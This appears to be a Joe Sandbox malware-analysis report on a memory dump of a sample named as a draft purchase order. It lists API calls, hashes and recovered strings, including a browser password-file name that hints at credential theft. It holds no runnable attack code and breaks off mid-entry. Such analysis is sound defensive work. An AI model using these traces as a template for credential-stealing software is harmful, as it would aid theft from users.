                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                • String ID: \StringFileInfo\
                                                                                • API String ID: 102104167-2245444037
                                                                                • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                APIs
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: MetricsSystem$PlacementWindow
                                                                                • String ID: AE
                                                                                • API String ID: 3548547718-685266089
                                                                                • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _memicmpwcslen
                                                                                • String ID: @@@@$History
                                                                                • API String ID: 1872909662-685208920
                                                                                • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004100FB
                                                                                • memset.MSVCRT ref: 00410112
                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                • _snwprintf.MSVCRT ref: 00410141
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                • String ID: </%s>
                                                                                • API String ID: 3400436232-259020660
                                                                                • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040E770
                                                                                • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendmemset
                                                                                • String ID: AE$"
                                                                                • API String ID: 568519121-1989281832
                                                                                • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040D58D
                                                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                • String ID: caption
                                                                                • API String ID: 1523050162-4135340389
                                                                                • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                APIs
                                                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                • String ID: MS Sans Serif
                                                                                • API String ID: 210187428-168460110
                                                                                • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName_wcsicmpmemset
                                                                                • String ID: edit
                                                                                • API String ID: 2747424523-2167791130
                                                                                • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                APIs
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                • String ID: SHAutoComplete$shlwapi.dll
                                                                                • API String ID: 3150196962-1506664499
                                                                                • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                APIs
                                                                                • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memcmp
                                                                                • String ID:
                                                                                • API String ID: 3384217055-0
                                                                                • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$memcpy
                                                                                • String ID:
                                                                                • API String ID: 368790112-0
                                                                                • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                APIs
                                                                                  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                • GetMenu.USER32(?), ref: 00410F8D
                                                                                • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                • String ID:
                                                                                • API String ID: 1889144086-0
                                                                                • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                APIs
                                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                • GetLastError.KERNEL32 ref: 0041810A
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                • String ID:
                                                                                • API String ID: 1661045500-0
                                                                                • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                APIs
                                                                                  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                Strings
                                                                                • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset
                                                                                • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                • API String ID: 1297977491-2063813899
                                                                                • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040560C
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                • String ID: *.*$dat$wand.dat
                                                                                • API String ID: 2618321458-1828844352
                                                                                • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                APIs
                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                • wcslen.MSVCRT ref: 00410C74
                                                                                • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                • String ID:
                                                                                • API String ID: 1549203181-0
                                                                                • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00412057
                                                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                • String ID:
                                                                                • API String ID: 3550944819-0
                                                                                • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
